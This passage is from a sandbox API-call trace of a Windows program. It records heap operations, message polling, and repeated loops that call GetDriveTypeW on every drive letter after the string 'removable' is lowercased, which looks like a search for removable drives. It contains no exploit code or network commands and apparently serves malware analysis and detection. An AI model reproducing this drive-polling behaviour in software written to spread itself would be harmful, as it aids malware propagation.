lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0220.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.631] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0220.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0220.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0220.631] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.632] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.632] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.632] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.632] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.633] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.633] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.633] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.633] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.634] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.634] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.634] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.635] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.635] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.635] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.635] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.636] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.636] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.636] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.637] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.637] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.637] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.637] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.637] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.638] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.638] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.638] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0220.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0220.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0220.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.639] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0220.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0220.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0220.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0220.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0220.640] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0220.640] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.641] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0220.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0220.641] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0220.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.641] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0220.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0220.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.641] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.641] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0220.641] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0220.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0220.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.642] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.642] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.642] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.642] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.642] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.643] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.643] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.643] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.643] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.643] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.644] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.644] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.644] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.644] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.644] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.644] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.645] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.645] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.645] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.645] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.645] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.645] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.646] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.646] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.646] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.646] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.647] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0220.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.647] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0220.647] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.647] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0220.647] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0220.647] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.647] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.647] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0220.648] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.648] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.648] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.648] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.648] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.648] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.648] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.648] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0220.648] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325dc0 [0220.648] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325dc0 | out: hHeap=0x12c0000) returned 1 [0220.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.648] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0220.648] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.648] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0220.649] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0220.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0220.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0220.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0220.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.649] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0220.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.649] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0220.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.649] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0220.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0220.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.649] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0220.649] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.649] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0220.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0220.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0220.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.650] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.650] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.650] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.650] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.650] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.650] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.651] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.651] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.651] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.651] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.652] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.652] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.652] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.652] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.652] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.652] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.653] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.653] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.653] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.653] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.653] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.653] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.654] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.654] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.654] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.654] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.654] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0220.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0220.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.655] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0220.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0220.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0220.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0220.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0220.655] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0220.656] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0220.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0220.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0220.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.656] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.656] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.656] 